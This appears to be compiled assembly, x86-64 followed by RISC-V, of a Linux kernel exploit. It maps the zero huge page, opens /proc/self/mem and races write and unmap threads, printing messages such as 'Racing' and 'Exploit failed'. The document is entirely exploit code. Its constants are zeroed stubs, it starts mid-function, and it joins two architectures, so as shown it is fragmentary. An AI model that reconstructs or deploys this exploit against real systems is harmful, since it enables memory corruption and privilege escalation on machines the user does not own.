%rdi call open@PLT movq %rax, 24(%rsp) testq %rax, %rax js .L32 leaq .LC8(%rip), %rdi leaq .LC10(%rip), %rbx call puts@PLT movl $0, 32(%rsp) jmp .L15 .L18: movq %rsp, %r13 movl wait_for_success(%rip), %edx xorl %esi, %esi leaq 60(%rsp), %rdi movq $0, 40(%rsp) movq %r13, %rcx call pthread_create@PLT movl unmap_and_read_thread(%rip), %edx xorl %esi, %esi movq %r13, %rcx leaq 64(%rsp), %rdi movl %eax, %r12d call pthread_create@PLT movl write_thread(%rip), %edx xorl %esi, %esi movq %r13, %rcx leaq 68(%rsp), %rdi orl %eax, %r12d call pthread_create@PLT orl %eax, %r12d jne .L33 movl 60(%rsp), %edi xorl %esi, %esi call pthread_join@PLT movl 64(%rsp), %edi xorl %esi, %esi call pthread_join@PLT movl 68(%rsp), %edi xorl %esi, %esi call pthread_join@PLT movl 32(%rsp), %esi movq %rbx, %rdi xorl %eax, %eax addl PAGE_SIZE(%rip), %esi movl %esi, 32(%rsp) call printf@PLT .L15: movl MAP_SIZE(%rip), %eax cmpl %eax, 32(%rsp) jl .L18 leaq .LC11(%rip), %rdi xorl %r12d, %r12d call puts@PLT .L17: movq 24(%rsp), %rdi movl %r12d, %ebx call close@PLT .L14: movq 16(%rsp), %rdi call close@PLT .L12: movl 36(%rsp), %edi movl %ebx, %r12d call free@PLT jmp .L8 .L29: leaq .LC4(%rip), %rdi movl %ebx, %r12d call perror@PLT jmp .L8 .L32: leaq .LC7(%rip), %rdi call perror@PLT jmp .L14 .L28: leaq .LC0(%rip), %rdi call perror@PLT jmp .L5 .L30: leaq .LC5(%rip), %rdi call perror@PLT jmp .L8 .L33: leaq .LC9(%rip), %rdi call perror@PLT jmp .L17 .L31: leaq .LC7(%rip), %rdi call perror@PLT jmp .L12 .L25: leaq .LC0(%rip), %rdi orl $-1, %r12d call perror@PLT jmp .L1 .L27: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size main, .-main .globl write_thread .bss .align 8 .type write_thread, @object .size write_thread, 8 write_thread: .zero 8 .globl wait_for_success .align 8 .type wait_for_success, @object .size wait_for_success, 8 wait_for_success: .zero 8 .globl unmap_and_read_thread .align 8 .type unmap_and_read_thread, @object .size unmap_and_read_thread, 8 unmap_and_read_thread: .zero 8 .globl stderr .align 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .globl PROT_READ .align 4 .type PROT_READ, @object .size PROT_READ, 4 PROT_READ: .zero 4 .globl PAGE_SIZE .align 8 .type PAGE_SIZE, @object .size PAGE_SIZE, 8 PAGE_SIZE: .zero 8 .globl O_RDWR .align 4 .type O_RDWR, @object .size O_RDWR, 4 O_RDWR: .zero 4 .globl MEMESET_VAL .align 4 .type MEMESET_VAL, @object .size MEMESET_VAL, 4 MEMESET_VAL: .zero 4 .globl MAP_SIZE .align 4 .type MAP_SIZE, @object .size MAP_SIZE, 4 MAP_SIZE: .zero 4 .globl MAP_PRIVATE .align 4 .type MAP_PRIVATE, @object .size MAP_PRIVATE, 4 MAP_PRIVATE: .zero 4 .globl MAP_FAILED .align 8 .type MAP_FAILED, @object .size MAP_FAILED, 8 MAP_FAILED: .zero 8 .globl MAP_BASE .align 8 .type MAP_BASE, @object .size MAP_BASE, 8 MAP_BASE: .zero 8 .globl MAP_ANONYMOUS .align 4 .type MAP_ANONYMOUS, @object .size MAP_ANONYMOUS, 4 MAP_ANONYMOUS: .zero 4 .globl MADV_HUGEPAGE .align 4 .type MADV_HUGEPAGE, @object .size MADV_HUGEPAGE, 4 MADV_HUGEPAGE: .zero 4 .globl g_aug_volatile_9387 .data .align 4 .type g_aug_volatile_9387, @object .size g_aug_volatile_9387, 4 g_aug_volatile_9387: .long 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_43199.c_main_aug_v3_3.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[!] mmap()" .align 3 .LC1: .string "[!] Didn't get desired base address for the vulnerable mapping.\n" .align 3 .LC2: .string "[*] The beginning of the zero huge page: %lx\n" .align 3 .LC3: .string "[!] Didn't get desired base address for the check mapping.\n" .align 3 .LC4: .string "[!] madvise()" .align 3 .LC5: .string "[!] malloc()" .align 3 .LC6: .string "/proc/self/mem" .align 3 .LC7: .string "[!] open()" .align 3 .LC8: .string "[*] Racing. Gonna take a while..." .align 3 .LC9: .string "[!] pthread_create()" .align 3 .LC10: .string "[*] Done 0x%lx bytes\n" .align 3 .LC11: .string "[*] Success!" .align 3 .LC12: .string "[!] Exploit failed.\n" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-160 sd s0,144(sp) lla s0,.LANCHOR1 lw a7,0(s0) lw a3,4(s0) sd s2,128(sp) la s2,__stack_chk_guard ld a5, 0(s2) sd a5, 72(sp) li a5, 0 lw a2,8(s0) lw a1,12(s0) ld a0,16(s0) lw a6,.LANCHOR0 addiw a6,a6,1 or a3,a7,a3 li a4,-1 sd ra,152(sp) sd s1,136(sp) sd s3,120(sp) sd s4,112(sp) sd s5,104(sp) sd s6,96(sp) sd s7,88(sp) sw a6,.LANCHOR0,a7 call mmap@plt ld a5,24(s0) sd a0,8(sp) beq a0,a5,.L25 ld a5,16(s0) beq a0,a5,.L4 lw a0,32(s0) lla a1,.LC1 call fprintf@plt .L5: lw a1,12(s0) ld a0,8(sp) call munmap@plt bne s3,zero,.L26 .L3: ld a4, 72(sp) ld a5, 0(s2) xor a5, a4, a5 li a4, 0 bne a5,zero,.L27 ld ra,152(sp) ld s0,144(sp) ld s1,136(sp) ld s2,128(sp) ld s4,112(sp) ld s5,104(sp) ld s6,96(sp) ld s7,88(sp) mv a0,s3 ld s3,120(sp) addi sp,sp,160 jr ra .L4: ld a1,0(a0) lla a0,.LC2 call printf@plt lw a1,12(s0) ld s1,16(s0) lw a0,0(s0) lw a3,4(s0) slliw a5,a1,1 lw a2,8(s0) add s1,s1,a5 or a3,a0,a3 li a5,0 li a4,-1 mv a0,s1 call mmap@plt ld a5,24(s0) sd a0,16(sp) beq a0,a5,.L28 beq a0,s1,.L7 lw a0,32(s0) lla a1,.LC3 call fprintf@plt .L8: lw a1,12(s0) ld a0,16(sp) call munmap@plt j .L5 .L26: lw a0,32(s0) lla a1,.LC12 call fprintf@plt j .L3 .L7: lw a2,36(s0) lw a1,12(s0) ld a0,8(sp) call madvise@plt mv s1,a0 lw a2,36(s0) lw a1,12(s0) ld a0,16(sp) call madvise@plt or s1,s1,a0 sext.w s1,s1 bne s1,zero,.L29 ld a0,40(s0) call malloc@plt sw a0,44(sp) mv s3,a0 beq a0,zero,.L30 ld a2,40(s0) lw a1,48(s0) call memset@plt lw a1,52(s0) lla a0,.LC6 call open@plt sd a0,24(sp) blt a0,zero,.L31 lw a1,52(s0) lla a0,.LC6 call open@plt sd a0,32(sp) blt a0,zero,.L32 lla a0,.LC8 call puts@plt addi s3,sp,8 sw zero,40(sp) addi s6,sp,56 addi s5,sp,60 addi s4,sp,64 lla s7,.LC10 j .L15 .L18: lw a2,56(s0) mv a3,s3 li a1,0 mv a0,s6 sd zero,48(sp) call pthread_create@plt lw a2,64(s0) mv s1,a0 mv a3,s3 li a1,0 mv a0,s5 call pthread_create@plt lw a2,72(s0) or s1,s1,a0 mv a3,s3 li a1,0 mv a0,s4 sext.w s1,s1 call pthread_create@plt or s1,s1,a0 sext.w s1,s1 bne s1,zero,.L33 lw a0,56(sp) li a1,0 call pthread_join@plt lw a0,60(sp) li a1,0 call pthread_join@plt lw a0,64(sp) li a1,0 call pthread_join@plt lw a5,40(sp) ld a4,40(s0) mv a0,s7 addw a1,a5,a4 sw a1,40(sp) call printf@plt .L15: lw a4,40(sp) lw a5,12(s0) blt a4,a5,.L18 lla a0,.LC11 call puts@plt li s1,0 .L17: ld a0,32(sp) call close@plt .L14: ld a0,24(sp) call close@plt .L12: lw a0,44(sp) mv s3,s1 call free@plt j .L8 .L29: lla a0,.LC4 call perror@plt mv s3,s1 j .L8 .L32: lla a0,.LC7 call perror@plt j .L14 .L28: lla a0,.LC0 call perror@plt j .L5 .L30: lla a0,.LC5 call perror@plt j .L8 .L33: lla a0,.LC9 call perror@plt j .L17 .L31: lla a0,.LC7 call perror@plt j .L12 .L25: lla a0,.LC0 call perror@plt li s3,-1 j .L3 .L27: call __stack_chk_fail@plt .size main, .-main .globl write_thread .globl wait_for_success .globl unmap_and_read_thread .globl stderr .globl PROT_READ .globl PAGE_SIZE .globl O_RDWR .globl MEMESET_VAL .globl MAP_SIZE .globl MAP_PRIVATE .globl MAP_FAILED .globl MAP_BASE .globl MAP_ANONYMOUS .globl MADV_HUGEPAGE .globl g_aug_volatile_9387 .data .align 2 .set .LANCHOR0,. + 0 .type g_aug_volatile_9387, @object .size g_aug_volatile_9387, 4 g_aug_volatile_9387: .word 4 .bss .align 3 .set .LANCHOR1,. + 0 .type MAP_PRIVATE, @object .size MAP_PRIVATE, 4 MAP_PRIVATE: .zero 4 .type MAP_ANONYMOUS, @object .size MAP_ANONYMOUS, 4 MAP_ANONYMOUS: .zero 4 .type PROT_READ, @object .size PROT_READ, 4 PROT_READ: .zero 4 .type MAP_SIZE, @object .size MAP_SIZE, 4 MAP_SIZE: .zero 4 .type MAP_BASE, @object .size MAP_BASE, 8 MAP_BASE: .zero 8 .type MAP_FAILED, @object .size MAP_FAILED, 8 MAP_FAILED: .zero 8 .type stderr, @object .size stderr, 4 stderr: .zero 4 .type MADV_HUGEPAGE, @object .size MADV_HUGEPAGE, 4 MADV_HUGEPAGE: .zero 4 .type PAGE_SIZE, @object .size PAGE_SIZE, 8 PAGE_SIZE: .zero 8 .type MEMESET_VAL, @object .size MEMESET_VAL, 4 MEMESET_VAL: .zero 4 .type O_RDWR, @object .size O_RDWR, 4 O_RDWR: .zero 4 .type wait_for_success, @object .size wait_for_success, 8 wait_for_success: .zero 8 .type unmap_and_read_thread, @object .size unmap_and_read_thread, 8 unmap_and_read_thread: .zero 8 .type write_thread, @object .size write_thread, 8 write_thread: .zero 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits